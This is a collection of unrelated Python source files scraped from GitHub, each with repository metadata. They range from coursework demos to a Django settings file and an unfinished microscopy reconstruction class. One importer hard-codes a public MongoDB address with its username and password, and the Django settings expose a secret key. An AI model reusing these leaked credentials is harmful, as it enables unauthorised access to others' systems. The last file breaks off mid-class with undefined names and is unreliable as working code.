d224d3604bd4bf178bcc2ccbd591c0f88336a58b | 77d808f47101202db6cec5a9eee6b38c55f73fde | /24. Regular Expressions/04.py | 62ae2b81b1544adb49f3011abd21606be8b3f9cb | [] | no_license | dimDamyanov/Py-Fundamentals | 2ce5591fbfebf8d95c832e3f7109b24e53dd721b | 5ccae5bfa456829d97e8773ee9f5eaa5f5051765 | refs/heads/main | 2023-01-29T22:21:07.788061 | 2020-12-13T08:11:04 | 2020-12-13T08:11:04 | 317,682,227 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | import re
data = input()
numbers = [n.group(0) for n in re.finditer(r'(^|(?<=\s))-*\d+(\.\d+)*($|(?=\s))', data)]
print(*numbers, sep=' ') | [
"dim.damianov@gmail.com"
] | dim.damianov@gmail.com |
3261a6b00f09d4b7e14c5f54e246398875eded67 | 653ba1fa7bacf0a30f6dd3512387d7ac24559c0c | /import_artists.py | 26b5f1847c156e295e415fc0788987422ecc916c | [] | no_license | jtngrg1992/artscrape | f985eb7a9c550d8f84edc1484f362c36bbb293ed | ee1b6182f95f4e6f49458ccc808f97fd20e974cd | refs/heads/master | 2021-01-01T05:12:30.446180 | 2016-05-30T16:59:08 | 2016-05-30T16:59:08 | 59,461,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 669 | py | import csv
import json
import pymongo
from pymongo import MongoClient
dbclient = pymongo.MongoClient("45.55.232.5:27017")
dbclient.artists.authenticate("artSales", "Jl@B$!@#", mechanism='MONGODB-CR')
print(dbclient)
db=dbclient.artists
data=db.allartists
columns=["artist"]
try:
# with open('safronscrape.csv') as csvfile:
csvfile = open('artist_list.csv', 'r')
reader=csv.DictReader(csvfile, delimiter="^")
i=0;
for row in reader:
print(row)
data.insert(row)
# row=json.dumps(row)
# row=json.load(row)
# print(row)
# row['IMAGE_LINK']="http://jlabs.co/artists/images/noimage.jpg"
# print(data.insert(row.copy) )
except Exception as e:
print(str(e))
| [
"jtngrg1992@hotmail.com"
] | jtngrg1992@hotmail.com |
2ee9389f7c4cbb371e4ba28c7b50747868bdd137 | 26ab0c567ad10573970d03892d85acecc0892f3a | /Load Sql Table.py | 5e2e0edd52a0cc363911d905d43e2333e0d588d9 | [] | no_license | Vijay20796/vijay | 80033cd7d1a68f42a37b65ab888cea4b8655b21f | 3ad04bd1f7bc631bcfc2fc9e6447ba4f3bf8b49a | refs/heads/master | 2020-06-21T02:15:19.845510 | 2019-07-24T18:54:55 | 2019-07-24T18:54:55 | 197,320,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,488 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jun 6 21:02:59 2019
@author: hzhou
"""
##### 1.
import pyodbc
import sqlalchemy
from datetime import datetime, time
from openpyxl import load_workbook
from math import radians, sin, cos, acos
values = []
conn = pyodbc.connect('Driver={SQL Server Native Client 11.0};''Server=VTCTZHOU;''Database=mydb;''Trusted_Connection=yes;')
engine=sqlalchemy.create_engine('mssql+pyodbc:///?odbc_connect={}'.format(conn))
cursor = conn.cursor()
cursor.execute('truncate TABLE dbo.Attribute')
i=0
for row in load_workbook('Q1.xlsx').worksheets[0].iter_rows():
if i!=0:
row = [cell.value if cell.value is not None else '' for cell in row]
timedelta = datetime.strptime( row[1], '%m/%d/%Y %H:%M')-datetime.strptime( row[0], '%m/%d/%Y %H:%M')
duration=timedelta.days * 24 * 3600 + timedelta.seconds
isWeekend = 1 if datetime.strptime( row[0], '%m/%d/%Y %H:%M').weekday()>=5 else 0
hour_of_day=datetime.strptime( row[0], '%m/%d/%Y %H:%M').hour
dist = 6371.01 * acos(sin(row[2])*sin(row[4]) + cos(row[2])*cos(row[4])*cos(row[3] - row[5]))
cursor.execute("INSERT INTO dbo.Attribute(StartTime,EndTime,Start_Latitude,Start_Longitude,End_Latitude,End_Longitude,duration,is_Weekend,hour_of_the_day,distance) VALUES (?,?,?,?,?,?,?,?,?,?)" , row[0],row[1],row[2],row[3],row[4],row[5],duration,isWeekend,hour_of_day,dist)
i=i+1
conn.commit()
conn.close()
| [
"noreply@github.com"
] | noreply@github.com |
dee0adedecbf760a83859e241b0d54dcace2d253 | 3ae9846d6d82f1d8cc5820d161ebba864cdaee5e | /simulator/simulateTest/simulatorTestDemo.py | 0d3a4dfdc8d5b6213bcdbafa9125180615780d39 | [] | no_license | rhett-chen/GPNet | 7704e66d5ed880522c92208824d1eaed267bce5a | 322c7a29c9b0bdd755dd7ef87190a2ed4adebdc9 | refs/heads/master | 2023-03-21T19:31:37.376158 | 2021-03-22T06:22:33 | 2021-03-22T06:22:33 | 350,227,822 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,413 | py | import os
import numpy as np
import torch
import argparse
import sys
sys.path.append(os.getcwd())
from simulator.simulateTest.AutoGraspShapeCoreUtil import AutoGraspUtil
# parser = argparse.ArgumentParser(description='ShapeNetSem Grasp testing')
# parser.add_argument('-t', '--testFile', default='prediction/500ntop10.txt', type=str, metavar='FILE',
# help='testFile path')
# # parser.add_argument('-n', '--samplePerObject', default=10, type=int, metavar='N', help='sample num per object')
# parser.add_argument('-p', '--processNum', default=18, type=int, metavar='N', help='process num using')
# parser.add_argument('-w', '--haveWidth', default=1, type=int, metavar='N', help='0 : no width ; 1 : have width')
# parser.add_argument('--gripperFile', default='/data/shapeNet/annotator2/parallel_simple.urdf', type=str,
# metavar='FILE', help='gripper file')
# parser.add_argument('--objMeshRoot', default='/data/shapeNet/urdf', type=str, metavar='PATH', help='obj mesh path')
parser = argparse.ArgumentParser(description='ShapeNetSem Grasp testing')
parser.add_argument('-t', '--testFile', default='simulator/gpnet_data/prediction/nms_poses_view0.txt', type=str,
metavar='FILE', help='testFile path')
# parser.add_argument('-n', '--samplePerObject', default=10, type=int, metavar='N', help='sample num per object')
parser.add_argument('-p', '--processNum', default=1, type=int, metavar='N', help='process num using')
# parser.add_argument('-w', '--haveWidth', default=0, type=int, metavar='N', help='0 : no width ; 1 : have width')
parser.add_argument('-w', "--width", action="store_true", dest="width", default=False,
help="turn on this param if test file contains width.")
parser.add_argument('--gripperFile', default='simulator/gpnet_data/gripper/parallel_simple.urdf', type=str,
metavar='FILE', help='gripper file')
parser.add_argument('--objMeshRoot', default='simulator/gpnet_data/urdf', type=str, metavar='PATH',
help='obj mesh path')
def getObjStatusAndAnnotation(testFile, haveWidth=False):
with open(testFile, 'r') as testData:
lines = testData.readlines()
objIdList = []
quaternionDict = {}
centerDict = {}
# 0: scaling 1~3: position 4~7: orientation 8: staticFrictionCoeff
objId = 'invalid'
objCounter = -1
annotationCounter = -1
for line in lines:
# new object
msg = line.strip()
if len(msg.split(',')) < 2:
objId = msg.strip()
# skip invalid
# begin
objCounter += 1
objIdList.append(objId)
quaternionDict[objId] = np.empty(shape=(0, 4), dtype=np.float)
centerDict[objId] = np.empty(shape=(0, 3), dtype=np.float)
annotationCounter = -1
# read annotation
else:
# skip invalid object
if objId == 'invalid':
continue
# begin
annotationCounter += 1
pose = msg.split(',')
# print(objId, annotationCounter)
if haveWidth:
length = float(pose[0]) * 0.085 # arbitrary value, will not be used in AutoGrasp
length = length if length < 0.085 else 0.085
position = np.array([float(pose[1]), float(pose[2]), float(pose[3])])
quaternion = np.array([float(pose[4]), float(pose[5]), float(pose[6]), float(pose[7])])
# quaternion = quaternion[[1, 2, 3, 0]]
else:
length = 0.000 # arbitrary value, will not be used in AutoGrasp
position = np.array([float(pose[0]), float(pose[1]), float(pose[2])])
quaternion = np.array([float(pose[3]), float(pose[4]), float(pose[5]), float(pose[6])])
# quaternion = quaternion[[1, 2, 3, 0]]
# print(objCounter, annotationCounter)
quaternionDict[objId] = np.concatenate((quaternionDict[objId], quaternion[None, :]), axis=0)
centerDict[objId] = np.concatenate((centerDict[objId], position[None, :]), axis=0)
return quaternionDict, centerDict, objIdList
if __name__ == "__main__":
cfg = parser.parse_args()
objMeshRoot = cfg.objMeshRoot
processNum = cfg.processNum
gripperFile = cfg.gripperFile
haveWidth = cfg.width
testInfoFile = cfg.testFile
logFile = cfg.testFile[:-4] + '_log.csv'
print(os.getcwd())
open(logFile, 'w').close()
simulator = AutoGraspUtil()
quaternionDict, centerDict, objIdList = getObjStatusAndAnnotation(testInfoFile, haveWidth)
for objId in objIdList:
q = quaternionDict[objId]
c = centerDict[objId]
simulator.addObject2(
objId=objId,
quaternion=q,
translation=c
)
simulator.parallelSimulation(
logFile=logFile,
objMeshRoot=objMeshRoot,
processNum=processNum,
gripperFile=gripperFile,
)
annotationSuccessDict = simulator.getSuccessData(logFile=logFile)
# print(top 10% 30% 50% 100%)
top10, top30, top50, top100 = simulator.getStatistic(annotationSuccessDict)
print('top10:\t', top10, '\ntop30:\t', top30, '\ntop50:\t', top50, '\ntop100:\t', top100) | [
"rhettchen6@outlook.com"
] | rhettchen6@outlook.com |
3fe648ab8a236b2ab1345962cb2d07556e4ac8eb | 7d25815930c03021e37ee003d91fc3116f03ba7f | /new_project/settings.py | 2ae186dfb3048efe35c6e4649f84c008365dd176 | [] | no_license | Tanniru-yashwanth/boards | 771ca023efd9c5d7989181bd6acdba253b3832f5 | 05d64c0c545b55bcf905e2f9e71d843d77645aa5 | refs/heads/master | 2023-07-16T23:33:05.292633 | 2021-08-31T16:14:28 | 2021-08-31T16:14:28 | 401,649,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,771 | py | """
Django settings for new_project project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
import django_heroku
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-d@j(k7_%k-w4xh-n65hp7k=1cn3!gog4t!g%6qgw*uvuf&(f9w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'widget_tweaks',
'boards',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'new_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'new_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
"""setting logout redirection to home"""
LOGOUT_REDIRECT_URL = 'home'
"""setting login to home"""
LOGIN_REDIRECT_URL = 'home'
"""To configure the email backend"""
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGIN_URL = 'login'
django_heroku.settings(locals())
| [
"tanniruyashwanth07@gmail.com"
] | tanniruyashwanth07@gmail.com |
2d543325ab4a419742851d38c1248b80764d2281 | dccc2fd7d5ed88d2c85f551f0a6543d55d465b16 | /test.py | abf1ecc61cd2265c7e07b49d3dde3551cfacf5a4 | [] | no_license | wardaharshad/Emotion-Detection | 5375622be625f21f357fd552a51a1353586acac7 | 2bc55ed6e852b6a8d3acb6d77e424edfe27aa4a8 | refs/heads/main | 2023-06-24T04:57:27.883809 | 2021-07-11T16:35:00 | 2021-07-11T16:35:00 | 384,992,464 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,738 | py | '''
Emotion Detection Using AI
'''
#USAGE : python test.py
from keras.models import load_model
from time import sleep
from keras.preprocessing.image import img_to_array
from keras.preprocessing import image
import cv2
import numpy as np
face_classifier = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')
classifier =load_model('./Emotion_Detection.h5')
class_labels = ['Angry','Happy','Neutral','Sad','Surprise']
cap = cv2.VideoCapture(0)
while True:
# Grab a single frame of video
ret, frame = cap.read()
labels = []
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(gray,1.3,5)
for (x,y,w,h) in faces:
cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h,x:x+w]
roi_gray = cv2.resize(roi_gray,(48,48),interpolation=cv2.INTER_AREA)
if np.sum([roi_gray])!=0:
roi = roi_gray.astype('float')/255.0
roi = img_to_array(roi)
roi = np.expand_dims(roi,axis=0)
# make a prediction on the ROI, then lookup the class
preds = classifier.predict(roi)[0]
print("\nprediction = ",preds)
label=class_labels[preds.argmax()]
print("\nprediction max = ",preds.argmax())
print("\nlabel = ",label)
label_position = (x,y)
cv2.putText(frame,label,label_position,cv2.FONT_HERSHEY_SIMPLEX,2,(0,255,0),3)
else:
cv2.putText(frame,'No Face Found',(20,60),cv2.FONT_HERSHEY_SIMPLEX,2,(0,255,0),3)
print("\n\n")
cv2.imshow('Emotion Detector',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | noreply@github.com |
413ea73f3d48081fa92bd302cc85004ec2d6250b | 1604b9a7f00b1f71f947d5ed6246ae06f16dd311 | /LanguageModels/SpellCorrect.py | eac890bb467c73e5af94fbc9b6deec1900d548bc | [] | no_license | sezhiyanhari/Natural-Language | 0cd1c086908c19f6ccc435547e1f027977ebc441 | d56c6ba80683df0d909c2e4e1aab943f11b7dd2c | refs/heads/master | 2021-09-20T19:54:41.784198 | 2018-08-14T22:18:15 | 2018-08-14T22:18:15 | 119,505,147 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,714 | py | ##
# Credit Zhou Yu, Dan Jurafsky, Peter Norvig
# Updated Kevin Jesse
# Open source code under MIT license
##
import math
from Datum import Datum
from Sentence import Sentence
from Corpus import Corpus
from UniformModel import UniformModel
from UnigramModel import UnigramModel
from BackoffModel import BackoffModel
from SmoothUnigramModel import SmoothUnigramModel
from SmoothBigramModel import SmoothBigramModel
from CustomModel import CustomModel
from EditModel import EditModel
from SpellingResult import SpellingResult
import types
import re, collections
class SpellCorrect:
"""Spelling corrector for sentences. Holds edit model, language model and the corpus."""
def __init__(self, lm, corpus):
self.languageModel = lm
self.editModel = EditModel('data/count_1edit.txt', corpus)
def correctSentence(self, sentence):
"""Assuming exactly one error per sentence, returns the most probable corrected sentence.
Sentence is a list of words."""
if len(sentence) == 0:
return []
bestSentence = sentence[:] #copy of sentence
bestScore = float('-inf')
for i in xrange(1, len(sentence) - 1): #ignore <s> and </s>
# TODO: select the maximum probability sentence here, according to the noisy channel model.
# Tip: self.editModel.editProbabilities(word) gives edits and log-probabilities according to your edit model.
# You should iterate through these values instead of enumerating all edits.
# Tip: self.languageModel.score(trialSentence) gives log-probability of a sentence
originalWord = sentence[i]
editProbabilities = self.editModel.editProbabilities(originalWord)
# print(editProbabilities)
for word, mass in editProbabilities:
sentence[i] = word
newScore = mass + self.languageModel.score(sentence)
if(newScore > bestScore):
bestScore = newScore
bestSentence = sentence[:]
sentence[i] = originalWord
return bestSentence
def evaluate(self, corpus):
"""Tests this speller on a corpus, returns a SpellingResult"""
numCorrect = 0
numTotal = 0
testData = corpus.generateTestCases()
for sentence in testData:
if sentence.isEmpty():
continue
errorSentence = sentence.getErrorSentence()
hypothesis = self.correctSentence(errorSentence)
if sentence.isCorrection(hypothesis):
numCorrect += 1
numTotal += 1
return SpellingResult(numCorrect, numTotal)
def correctCorpus(self, corpus):
"""Corrects a whole corpus, returns a JSON representation of the output."""
string_list = [] # we will join these with commas, bookended with []
sentences = corpus.corpus
for sentence in sentences:
uncorrected = sentence.getErrorSentence()
corrected = self.correctSentence(uncorrected)
word_list = '["%s"]' % '","'.join(corrected)
string_list.append(word_list)
output = '[%s]' % ','.join(string_list)
return output
def main():
"""Trains all of the language models and tests them on the dev data. Change devPath if you
wish to do things like test on the training data."""
trainPath = 'data/tagged-train.dat'
trainingCorpus = Corpus(trainPath)
devPath = 'data/tagged-dev.dat'
devCorpus = Corpus(devPath)
print 'Unigram Language Model: '
unigramLM = UnigramModel(trainingCorpus)
unigramSpell = SpellCorrect(unigramLM, trainingCorpus)
unigramOutcome = unigramSpell.evaluate(devCorpus)
print str(unigramOutcome)
print 'Uniform Language Model: '
uniformLM = UniformModel(trainingCorpus)
uniformSpell = SpellCorrect(uniformLM, trainingCorpus)
uniformOutcome = uniformSpell.evaluate(devCorpus)
print str(uniformOutcome)
print 'Smooth Unigram Language Model: '
smoothUnigramLM = SmoothUnigramModel(trainingCorpus)
smoothUnigramSpell = SpellCorrect(smoothUnigramLM, trainingCorpus)
smoothUnigramOutcome = smoothUnigramSpell.evaluate(devCorpus)
print str(smoothUnigramOutcome)
print 'Smooth Bigram Language Model: '
smoothBigramLM = SmoothBigramModel(trainingCorpus)
smoothBigramSpell = SpellCorrect(smoothBigramLM, trainingCorpus)
smoothBigramOutcome = smoothBigramSpell.evaluate(devCorpus)
print str(smoothBigramOutcome)
print 'Backoff Language Model: '
backoffLM = BackoffModel(trainingCorpus)
backoffSpell = SpellCorrect(backoffLM, trainingCorpus)
backoffOutcome = backoffSpell.evaluate(devCorpus)
print str(backoffOutcome)
print 'Custom Language Model: '
customLM = CustomModel(trainingCorpus)
customSpell = SpellCorrect(customLM, trainingCorpus)
customOutcome = customSpell.evaluate(devCorpus)
print str(customOutcome)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
4911d82b51dc9ec4b68a07e2dc8f0b5229a842e6 | 099f8740e61878c92c067e96d76ccb014cd342c3 | /robovat/simulation/__init__.py | 718ea92343dbbbccf8f49643d7c02676671f222b | [
"MIT"
] | permissive | UT-Austin-RPL/robovat | c52d7f0b5b4244ad19fc7c15c876e005626bf182 | c333ce7f1d7b156bedf28c3b09793f5487b6690a | refs/heads/master | 2023-01-06T12:32:39.304293 | 2020-11-12T20:12:25 | 2020-11-12T20:12:25 | 290,521,446 | 7 | 2 | MIT | 2020-08-28T17:33:52 | 2020-08-26T14:37:23 | null | UTF-8 | Python | false | false | 381 | py | from robovat.simulation.base import Base
from robovat.simulation.body import Body
from robovat.simulation.constraint import Constraint
from robovat.simulation.controllable_body import ControllableBody
from robovat.simulation.entity import Entity
from robovat.simulation.joint import Joint
from robovat.simulation.link import Link
from robovat.simulation.simulator import Simulator
| [
"kuanfang@outlook.com"
] | kuanfang@outlook.com |
c06a72838532445c98d815aec09855d509744d32 | c45e0cac6fbdb3b2bd56a9976f291b686f2d1a0b | /base.py | f3a45e1305486b75afeaed9ab52507e5dd615eca | [] | no_license | Marcel-Zaripov/hotel_api_client | f9cd975c2d4709169eb89ad98d77d187ea913779 | c3ea4996fbbcbac828f59822fd94dc6e0b5c5761 | refs/heads/master | 2021-04-11T09:37:36.463628 | 2020-03-21T16:14:40 | 2020-03-21T16:14:40 | 249,008,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | class ClientBase(object):
""" Other endpoints are build on top
"""
endpoint = "/"
def __init__(self, client):
self.client = client
self.endpoint = client.endpoint + self.endpoint
@property
def transport(self):
"""
return type: transport.Transport
"""
return self.client.transport
def _url(self, *params):
url = (self.endpoint + ''.join(
'/' + str(p)
for p in params
if p is not None))
return url
| [
"marsel281292@gmail.com"
] | marsel281292@gmail.com |
1e5a9be74f78ccb91bf9ebd626783bf8123fcbaf | 8e2e28a191fa5ec5a6c070ec7e9ccad98c8b4a0b | /jiaocheng/02-python核心编程/05-getattribute属性.py | 0751dbd47c6556fed35b260ab822029c2dbcc613 | [
"Apache-2.0"
] | permissive | kellanfan/python | 4cd61cbc062e2eee3a900fa7447ca5f0b8f1a999 | 912dc05a3bd0ded9544166a68da23ca0a97b84da | refs/heads/master | 2023-04-06T03:04:38.851928 | 2023-04-01T02:45:56 | 2023-04-01T02:45:56 | 65,542,280 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 896 | py | class Itcast(object):
def __init__(self,subject1):
self.subject1 = subject1
self.subject2 = 'cpp'
#属性访问时拦截器,打log
def __getattribute__(self,obj):
print("====1>%s"%obj)
if obj == 'subject1':
print('log subject1')
return 'redirect python'
else: #测试时注释掉这2行,将找不到subject2
temp = object.__getattribute__(self,obj)
print("====2>%s"%str(temp))
# return temp
def show(self):
print('this is Itcast')
s = Itcast("python")
print(s.subject1)
print(s.subject2)
s.show()
#1. 先获取show属性对应的结果,,,,应该是一个方法
#2. 方法()
#就是说对象中,不管是属性还是方法都是引用,如果是方法,只是使用一个变量指向了一个函数
# import types
# p1.eat = types.MethodType(eat, p1)
| [
"icyfk1989@163.com"
] | icyfk1989@163.com |
414ed28465cf60ea43c6d12ba7607866090bf80f | 97f6a698b73d1759b90054e1600ff7498a7cc900 | /Node/index.py | 8250f9169ee98fb978d29f3d6d0d441b54fc4f9c | [] | no_license | kwishna/LearnJs | 0a18cc9d26df7cc7617584ba7d8fa93cbc6a700f | 9dcc7fbedc4e9799f1bb73666e378a8b339efaa5 | refs/heads/master | 2022-12-22T13:12:52.760580 | 2019-12-03T13:42:49 | 2019-12-03T13:42:49 | 225,630,581 | 0 | 0 | null | 2022-12-11T15:48:55 | 2019-12-03T13:46:38 | JavaScript | UTF-8 | Python | false | false | 90 | py | import wget
wget.download('https://go.microsoft.com/fwlink/?LinkID=521962', './mukk.xlsx') | [
"krishna.singh16@wipro.com"
] | krishna.singh16@wipro.com |
ee2b56937ab41dce748d91597d495e18e0016a07 | e0ed7f8eb422ee85f1d7a4b69f6365ba543a5ca7 | /client_server_app/lesson_6/when_deco_is_called.py | 996b80f8d8c61625978a339c7fcdd4ac5ff34b0c | [] | no_license | tataurova/lessons-gb-python | 5e3ce6a4eef86fe20c962a011050004d9e8daedb | 60c7d9fd414dd1177b8a10e7683906c49e126a80 | refs/heads/master | 2020-05-05T12:31:44.250108 | 2019-07-12T20:46:55 | 2019-07-12T20:46:55 | 180,032,871 | 0 | 0 | null | 2019-05-06T07:39:11 | 2019-04-07T22:46:23 | HTML | UTF-8 | Python | false | false | 402 | py |
registry = []
def register(func):
print(' running register ( %s ) ' % func)
registry.append(func)
return func
@register
def f1():
print('running f1()')
@register
def f2():
print('running f2()')
def f3():
print('running f3()')
def main():
print(' running main()')
print(' registry ->', registry)
f1()
f2()
f3()
if __name__ == '__main__':
main()
| [
"tataurovaoe@yandex.ru"
] | tataurovaoe@yandex.ru |
380d3a2189f61ad5dc3288eb0e332b61aad92215 | 3a3f8a8c1e5cf039856c9da87161d21050892137 | /osiete_osint/apps/service/migrations/0020_auto_20210512_2220.py | cb00f138dcc322918bb2a16ffcc845745f47be28 | [] | no_license | yuta519/osiete_osint | 92237fad0584a82fcacacfd328151889640c7b8c | 7ba7a47a2beef91d66ac00d2a2a7f1d97f7fa912 | refs/heads/main | 2023-06-02T21:15:29.516912 | 2021-06-23T00:23:25 | 2021-06-23T00:23:25 | 352,069,857 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | # Generated by Django 3.1.7 on 2021-05-12 13:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('service', '0019_auto_20210428_1620'),
]
operations = [
migrations.RenameModel(
old_name='DataSearchHistry',
new_name='OsintSearchHistry',
),
]
| [
"yuta519.ka23tf@docomo.ne.jp"
] | yuta519.ka23tf@docomo.ne.jp |
8a660027140e9e78abc8c1cef9034e5860eafbef | fb613b77989f1c7db1cb4e149adf0430f7a1404a | /ewrec_class.py | 737298189a632a50750821fe3793b71a903c1388 | [
"MIT"
] | permissive | Jeffrey-Ede/AI-CV-Automation-Elect-Micr | ce64be88d8b76d88c2e29158fa2cd5cdf4d65a7c | b53072132046ff6f1e8861b96c4263abbee2b6eb | refs/heads/AI-CV-Automation-Electr-Micr | 2021-04-27T09:37:44.295030 | 2020-09-14T15:39:35 | 2020-09-14T15:39:35 | 122,518,865 | 3 | 0 | null | 2018-02-28T17:36:01 | 2018-02-22T18:34:05 | Python | UTF-8 | Python | false | false | 17,188 | py | import numpy as np
import glob
import cv2
import arrayfire as af
from skimage.measure import compare_ssim as ssim
from scipy.misc import imread
from scipy.optimize import minimize
class Utility(object):
def __init__(self):
pass
@staticmethod
def np_to_af(np_arr, dtype=af.Dtype.f32):
return af.Array(np_arr.ctypes.data, np_arr.shape, np_arr.dtype.char).as_type(dtype)
@staticmethod
def fft_shift(fft):
return af.shift(fft, fft.dims()[0]//2 + fft.dims()[0]%2, fft.dims()[1]//2 + fft.dims()[1]%2)
@staticmethod
def scale0to1(img):
"""Rescale image between 0 and 1"""
min = np.min(img)
max = np.max(img)
if min == max:
img.fill(0.5)
else:
img = (img-min) / (max-min)
return img.astype(np.float32)
def disp_af(arr):
cv2.namedWindow('CV_Window', cv2.WINDOW_NORMAL)
cv2.imshow('CV_Window', scale0to1(arr.__array__()))
cv2.waitKey(0)
return
@staticmethod
def af_phase(img):
f = lambda x: x if x < np.pi else np.pi-x
vecf = np.vectorize(f)
return vecf(phase)
@staticmethod
def disp_af_complex_amp(fft, log_of_fft=True):
amp = np.log(np.absolute(fft)) if log_of_fft else np.absolute(fft)
cv2.namedWindow('CV_Window', cv2.WINDOW_NORMAL)
cv2.imshow('CV_Window', scale0to1(amp))
cv2.waitKey(0)
return
@staticmethod
def disp_af_complex_phase(fft):
cv2.namedWindow('CV_Window', cv2.WINDOW_NORMAL)
cv2.imshow('CV_Window', scale0to1(af_phase(fft)))
cv2.waitKey(0)
return
@staticmethod
def save_af_as_npy(arr, filename, save_loc=""):
if filename[-4:-1] != ".npy":
filename += ".npy"
if save_loc[-1] != "/":
save_loc += "/"
np.save(save_loc+filename+".npy", arr.__array__())
return
@staticmethod
def get_radial_freq_hist(img, mean=1.0): #Currently unused
abs_shifted_fft = np.abs(np.fft.fftshift(np.fft.fft2(img)))
rows = cols = int(abs_shifted_fft.shape[0])
mid_row = mid_col = int(np.ceil(abs_shifted_fft.shape[0]/2))
max_rad = int(np.ceil(np.sqrt((mid_row)**2 + (mid_col)**2)))+1
radial_profile = np.zeros(max_rad)
for col in range(cols):
for row in range(rows):
radius = np.sqrt((row-mid_row+1)**2 + (col-mid_col+1)**2)
idx = int(np.ceil(radius))
radial_profile[idx] += abs_shifted_fft[col][row]
return radial_profile
@staticmethod
def af_padded_fft2(img, pad_val=0., pad_periods=1):
side = img.dims()[0]
padded_img = af.constant(0., (1+pad_periods)*side, (1+pad_periods)*side)
padded_img[:side, :side] = img
return af.fft2(padded_img)
@staticmethod
def af_unpadded_ifft2(fft, pad_periods=1):
side = fft.dims()[0] // (1+pad_periods)
return af.ifft2(fft)[:side, :side]
###########################################################################################
class EWREC(Utility):
def __init__(self,
stack_dir,
wavelength,
rel_pos=None,
rel_pos_method="phase_corr",
series_type = "cubic",
series_alternating=True, #Focuses alternating about in-focus position
series_middle = None, #Middle focus index only needed if series alternates about centre. If not
#provided, the halfway index will be chosen
series_increasing=True,
defocuses=None,
defocus_search_range=[0., 10.], #nm**-1?
reconstruction_side=None,
defocus_sweep_num=10, #Number of defocuses to try initial sweep to find the defocus
defocus_search_criteria = ["gradient_plateau"],
preprocess_fn=None,
param_refinement = False, #Time-consuming refinement of relative positions and defocus values
nn_refinement=False, #TODO
report_progress=True,
pad_periods=1,
pad_val=0.): #Number of periods of signal to pad it by for fft
self.stack_dir = stack_dir
self.stack = get_stack_from_tifs(dir)
if preprocess_fn:
self.stack = preprocess_fn(self.stack)
self.stack_side = self.stack[0].shape[0]
rel_pos_fns = {"phase_corr": self.rel_pos_phase_corr}
rel_pos = rel_pos_fns["phase_corr"]()
self.display_iter_nums = report_progress
self.pad_periods = pad_periods
self.pad_value = pad_value
#Focal series meta
self.wavelength = wavelength
self.series_type = focal_series_type
self.series_alternating = series_alternating
self.series_mid = series_middle
self.series_increasing = series_increasing
self.reconstruction_side = reconstruction_side
self.rel_pos = rel_pos if rel_pos else self.rel_pos_estimate(rel_pos_method, as_cropping_centres=True)
self.cropped_stack = self.crop_stack(self.rel_pos)
if defocuses:
self.defocuses = defocuses
else:
